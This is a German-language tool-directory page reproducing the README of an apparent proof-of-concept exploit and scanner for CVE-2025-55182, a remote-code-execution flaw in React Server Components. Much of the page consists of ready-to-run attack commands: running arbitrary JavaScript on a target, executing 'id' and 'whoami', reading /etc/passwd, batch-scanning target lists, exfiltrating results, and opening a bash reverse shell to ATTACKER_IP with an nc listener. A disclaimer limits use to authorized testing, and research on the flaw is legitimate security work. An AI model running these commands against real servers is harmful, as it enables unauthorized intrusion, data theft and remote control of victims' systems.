Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 8 MonatenNoch nicht geprüft

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| | |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

Remote Code Execution Scanner für React Server Components (RSC)

CVE Python


Credits

RolleNameLink
OriginalforschungLachlan Davidsongithub.com/lachlan2k

Basierend auf dem ursprünglichen PoC: React2Shell-CVE-2025-55182-original-poc


Übersicht

React2Shell ist ein umfassender Sicherheitsscanner für CVE-2025-55182, eine kritische Remote Code Execution (RCE)-Schwachstelle, die React Server Components (RSC)-Implementierungen betrifft. Diese Schwachstelle ermöglicht nicht authentifizierten Angreifern, beliebigen JavaScript-Code auf dem Server durch unsichere Deserialisierung im React Flight-Protokoll auszuführen.

Hauptfunktionen

  • Multi-Varianten-Tests: Testet 4 verschiedene Payload-Strukturen aus der ursprünglichen Forschung
  • Versionserkennung: Identifiziert betroffene React- und Framework-Versionen
  • RCE-Verifikation: Bestätigt Codeausführung durch Digest-Variation, Zeitmessung und OOB-Callbacks
  • OOB-Tests: Unterstützung für Burp Collaborator und Interactsh
  • Benutzerdefinierte Payloads: Ausführung beliebigen JavaScripts auf verwundbaren Servern
  • Datenextraktion: Zeichenweise Exfiltration von Ergebnissen
  • Professionelle Ausgabe: Saubere, farbige Terminalausgabe mit Beweissammlung

Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# Abhängigkeiten installieren
pip install requests

# Scanner ausführen
python3 exploit_cve_2025_55182_v2.py -h

Nutzung

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]

Scan-Modi

1. Versions-Modus (Standard)

Ermittelt passiv betroffene React- und Framework-Versionen:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. Verify-Modus (-m verify)

Bestätigt aktiv RCE mittels mehrerer Techniken und aller 4 Payload-Varianten:

root@kitploit:~
# Basis-Verifikation (Digest-Variation)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Mit zeitbasierter Verifikation
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# Mit OOB-Callback (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# Vollständige Verifikation mit ausführlicher Ausgabe
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. Benutzerdefinierter Modus (-m custom)

Führt beliebige JavaScript-Payloads aus:

root@kitploit:~
# Node.js-Version abrufen
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Systembefehl ausführen
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# Datei lesen
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. Batch-Scan (-f)

Mehrere URLs aus einer Datei scannen und nur verwundbare Ziele anzeigen:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

Beispiele

Einfache Scans

root@kitploit:~
# Versionserkennung (Standardmodus)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# RCE-Verifikation
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Batch-Scan mehrerer Ziele
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# Ausführliche Ausgabe
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

Fortgeschrittene Nutzung

root@kitploit:~
# Zeitbasierte + OOB-Verifikation
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback your-id.oastify.com

# Serverinfo extrahieren
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Befehl ausführen
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

Reverse Shell

root@kitploit:~
# Listener starten
nc -lvnp 443

# Reverse Shell ausführen
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

Haftungsausschluss

Dieses Werkzeug ist nur für autorisierte Sicherheitstests und Bildungszwecke vorgesehen.

  • Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie ausdrücklich die Erlaubnis haben.
  • Unautorisierter Zugriff auf Computersysteme ist illegal.
  • Die Autoren übernehmen keine Verantwortung für Missbrauch dieses Werkzeugs.
  • Beachten Sie stets die Praktiken der verantwortungsvollen Offenlegung.

Referenzen

  • CVE-2025-55182 – NVD
  • Original PoC von Lachlan Davidson
  • React-Sicherheitshinweis
  • Next.js-Sicherheitshinweis
  • Dokumentation der React Server Components
Tool herunterladen
ArgumentBeschreibung
-t, --targetZiel-URL (z. B. https://example.com)
-f, --fileDatei mit Liste von URLs (eine pro Zeile) für Batch-Scans
-m, --modeScan-Modus: version (Standard), verify oder custom
--jsJavaScript-Code für den benutzerdefinierten Modus
--extractZeichenweise Extraktion eines Zeichenketten-Ergebnisses
--sleep SECONDSZeitbasierte RCE-Verifikation (verify-Modus)
--callback URLHTTP-Callback-URL für OOB-Tests (verify-Modus)
--dns DOMAINDNS-Callback-Domain für OOB-Tests (verify-Modus)
-v, --verboseAusführliche Ausgabe mit Payload-Details
--no-colorFarbige Ausgabe deaktivieren
--timeout SECONDSHTTP-Request-Timeout (Standard: 30)